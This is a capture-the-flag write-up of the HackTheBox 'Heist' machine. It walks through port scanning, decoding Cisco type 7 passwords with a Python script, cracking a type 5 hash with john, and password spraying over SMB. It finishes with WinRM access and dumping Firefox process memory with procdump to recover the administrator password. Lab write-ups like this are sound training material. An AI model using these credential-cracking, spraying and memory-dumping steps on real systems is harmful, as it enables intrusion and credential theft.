![[HackTheBox] Heist](https://cdn.hashnode.com/res/hashnode/image/upload/v1731527279747/78331467-4c6e-4743-91d0-67adcd5fa8c3.png?w=1600&h=840&fit=crop&crop=entropy&auto=compress,format&format=webp)
Just another CISCO 5 Password / ProcDump Leak Write-up.
Footprinting
Open ports
The open ports are 80 (HTTP), RPC (135/49669), 445 (SMB) and 5985 (WinRM):
kali@kali:~$ nmap -p- -v10 -Pn --disable-arp-ping -oN tcp_full.nmap 10.10.10.149
kali@kali:~$ nmap -Pn --disable-arp-ping -sC -sV -v10 -p$(grep -oP '^\d*(?=/)(?=.* open )' tcp_full.nmap |sort -u |tr '\n' ',' |grep -oP '.*(?=,)') -oN nse.nmap 10.10.10.149
[...]
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-title: Support Login Page
|_Requested resource was login.php
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc syn-ack Microsoft Windows RPC
445/tcp open microsoft-ds? syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49669/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
[...]
This is a standard Windows machine, given the RPC and SMB services, whose FQDN is SUPPORTDESK.SupportDesk:
kal@kali:$ cme smb 10.10.10.149 -u 'a' -p ''
SMB 10.10.10.149 445 SUPPORTDESK [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\a: STATUS_LOGON_FAILURE
Is my CISCO encryption type okay ?
The web server uses the IIS technology, and is designed to give users a 24/7 support assistance:
Once logged on as a guest, we’re redirected to an issue:
From there, we have 2 potential usernames: Hazard and Super Admin. The issue is related to a CISCO setup, which we can download:
>>>
GET /attachments/config.txt HTTP/1.1
Host: 10.10.10.149
<<<
version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
synchronization
bgp log-neighbor-changes
bgp dampening
network 192.168.0.0Â mask 300.255.255.0
timers bgp 3 9
redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
session-timeout 600
authorization exec SSH
transport input ssh
In particular, two type 7 passwords, and one type 5 are defined.
However, as mentionned in a Cisco’s documentation named “Controlling Switch Access with Passwords and Privilege Levels”, this type of password is deprecated and must be updated to type 8 or 9. Indeed, as shown in an NSA Cybersecurity sheet, password types 0, 4 and 7 are deprecated, and only type 8 is recommanded:
More particularly, password set with an encryption type of:
0 is a plain text password.
4 is a non-salted SHA-256 hash using one iteration.
5 is an MD5 hash.
7 is a simple alphabetical Vigenere cipher.
We can decrypt the passwords using cisco7crack, or the following ChatGPT’s python script:
#!/usr/bin/python3
import sys
encoded_password = sys.argv[1]
cisco_seed = [0x64, 0x73, 0x66, 0x64, 0x3B, 0x6B, 0x66, 0x6F, 0x41, 0x2C, 0x2E, 0x69, 0x79, 0x65, 0x77, 0x72, 0x6B, 0x6C, 0x64, 0x4B, 0x44, 0x65, 0x63, 0x4F]
offset = int(encoded_password[:2])
encrypted_chars = encoded_password[2:]
decoded_password = ""
for i in range(0, len(encrypted_chars), 2):
char_code = int(encrypted_chars[i:i+2], 16)
decoded_password += chr(char_code ^ cisco_seed[(offset + i // 2) % len(cisco_seed)])
print("Decrypted type 7 password:", decoded_password)
kali@kali$ cisco7crack 0242114B0E143F015F5D1E161713
Encrypted string : 0242114B0E143F015F5D1E161713
Plain string : $uperP@ssword
kali@kali:~$ python3 cisco7decrypt.py 02375012182C1A1D751618034F36415408
Decrypted type 7 password: Q4)sJu\Y8qz*A3?d
However, neither rout3r:$uperP@ssword nor admin:Q4)sJu\Y8qz*A3?d credentials are valid in the web portal or SMB.
Regarding the type 5 password in the configuration, we could crack it using john:
kali@kali:~$ echo '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' |john --wordlist=/usr/share/wordlists/rockyou.txt /dev/stdin
stealth1agent (?)
Then, we can password spray our passwords with a list of guessable usernames:
kali@kali:~$ cat users.txt
Administrator
Guest
rout3r
admin
hazard
support admin
support
kali@kali:~$ cat passwords.txt
$uperP@ssword
Q4)sJu\Y8qz*A3?d
stealth1agent
Which discloses the SupportDesk\hazard:stealth1agent credentials !
kali@kali:~$ while read user; do (nxc smb 10.10.10.149 -u "$user" -p passwords.txt --local-auth |grep -vP '( \[\*\] | STATUS_LOGON_FAILURE |RPC_S_ACCESS_DENIED| Connection refused | ERROR )'&); done < users.txt
SMB 10.10.10.149 445 SUPPORTDESK [+] SUPPORTDESK\hazard:stealth1agent
Unfortunatly, hazard isn’t allowed to access any share:
kali@kali:~$ nxc smb 10.10.10.149 -u 'hazard' -p 'stealth1agent' --shares
Chasing WinRM RIDs
However, with these SMB creds, we can enumerate numerous things, including the local RIDs (accounts) on the target:
kali@kali:~$ cme smb 10.10.10.149 -u 'hazard' -p 'stealth1agent' --rid-brute
SMB 10.10.10.149 445 SUPPORTDESK [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.10.10.149 445 SUPPORTDESK [+] SupportDesk\hazard:stealth1agent
SMB 10.10.10.149 445 SUPPORTDESK [+] Brute forcing RIDs
SMB 10.10.10.149 445 SUPPORTDESK 500: SUPPORTDESK\Administrator (SidTypeUser)
SMB 10.10.10.149 445 SUPPORTDESK 501: SUPPORTDESK\Guest (SidTypeUser)
SMB 10.10.10.149 445 SUPPORTDESK 503: SUPPORTDESK\DefaultAccount (SidTypeUser)
SMB 10.10.10.149 445 SUPPORTDESK 504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
SMB 10.10.10.149 445 SUPPORTDESK 513: SUPPORTDESK\None (SidTypeGroup)
SMB 10.10.10.149 445 SUPPORTDESK 1008: SUPPORTDESK\Hazard (SidTypeUser)
SMB 10.10.10.149 445 SUPPORTDESK 1009: SUPPORTDESK\support (SidTypeUser)
SMB 10.10.10.149 445 SUPPORTDESK 1012: SUPPORTDESK\Chase (SidTypeUser)
SMB 10.10.10.149 445 SUPPORTDESK 1013: SUPPORTDESK\Jason (SidTypeUser)
We know Chase and Jason are valid users on the target. The credentials SupportDesk\chase:Q4)sJu\Y8qz*A3?d are valid !
kali@kali:~$ nxc smb 10.10.10.149 -u 'chase' -p 'Q4)sJu\Y8qz*A3?d' --shares
SMB 10.10.10.149 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.10.10.149 445 SUPPORTDESK [+] SupportDesk\chase:Q4)sJu\Y8qz*A3?d
SMB 10.10.10.149 445 SUPPORTDESK [*] Enumerated shares
SMB 10.10.10.149 445 SUPPORTDESK Share Permissions Remark
SMB 10.10.10.149 445 SUPPORTDESK ----- ----------- ------
SMB 10.10.10.149 445 SUPPORTDESK ADMIN$ Remote Admin
SMB 10.10.10.149 445 SUPPORTDESK C$ Default share
SMB 10.10.10.149 445 SUPPORTDESK IPC$ READ Remote IPC
Because we know WinRM is open, we may try to login to that service with chase:
kali@kali:~$ evil-winrm -i 10.10.10.149 -u 'SupportDesk\chase' -p 'Q4)sJu\Y8qz*A3?d'
*Evil-WinRM* PS C:\Users\Chase\Documents>
And retrieve the user flag:
*Evil-WinRM* PS C:\Users\Chase\Documents> get-content ../desktop/user.txt
cf[...]fe
Privilege escalation
Chasing firefox keys
There's a TODO file in the desktop:
*Evil-WinRM* PS C:\Users\Chase\desktop> get-content todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.
Done:
1. Restricted access for guest user.
I didn’t really know what to do with that file, but running WinPEAS on the target reveals that Firefox credentials are stored:
*Evil-WinRM* PS C:\Users\Chase\Documents> upload WinPEASx64.exe
*Evil-WinRM* PS C:\Users\Chase\Documents> ./WinPEASx64.exe > WinPEAS.txt
[...]
Firefox credentials file exists at C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Profiles\77nc64t5.default\key4.db
Chasing firefox dumps
Then, reading the notes again, it seems that some kind of regular task is run in the background:
1. Keep checking the issues list.
Therefore, an admin's password might be used periodically to keep checking issues in the background. Using procdump from the Sysinternals, we can dump the firefox processes.
There are currently 5 Firefox processes running. However, ProcDump can only dump one process at a time. The following ForEach loop (
%) will dump all the firefox processes inC:\Windows\Tasks\.
*Evil-WinRM* PS C:\Users\Chase\Documents> upload procdump64.exe
*Evil-WinRM* PS C:\Users\Chase\Documents> (get-process |where-object ProcessName -eq 'firefox').Id | % { ./procdump64.exe -accepteula -ma $_ c:\windows\tasks }
*Evil-WinRM* PS C:\Users\Chase\Documents> (dir C:\Windows\Tasks).Name
firefox.exe_241115_155142.dmp
firefox.exe_241115_155145.dmp
firefox.exe_241115_155146.dmp
firefox.exe_241115_155147.dmp
firefox.exe_241115_155148.dmp
In which we see the admin's creds via strings.exe :)
I limited the number of bytes to be analyzed with the
-boption to prevent memory crashes.
*Evil-WinRM* PS C:\Users\Chase\Documents> upload strings64.exe
*Evil-WinRM* PS C:\Users\Chase\Documents> ./strings64.exe -accepteula -n 50 -a -nobanner -b 5000000 C:\Windows\Tasks\firefox.exe_*.dmp |findstr /ri 'password'
[...]
C:\Windows\Tasks\firefox.exe_241115_155147.dmp: MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
C:\Windows\Tasks\firefox.exe_241115_155147.dmp: MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
C:\Windows\Tasks\firefox.exe_241115_155148.dmp: RG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
C:\Windows\Tasks\firefox.exe_241115_155148.dmp: MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
[...]
GG WP !
kali@kali:~$ evil-winrm -i 10.10.10.149 -u 'Administrator' -p '4dD!5}x/re8]FBuZ'
*Evil-WinRM* PS C:\Users\Administrator\Documents> get-content ../desktop/root.txt
ff[...]8f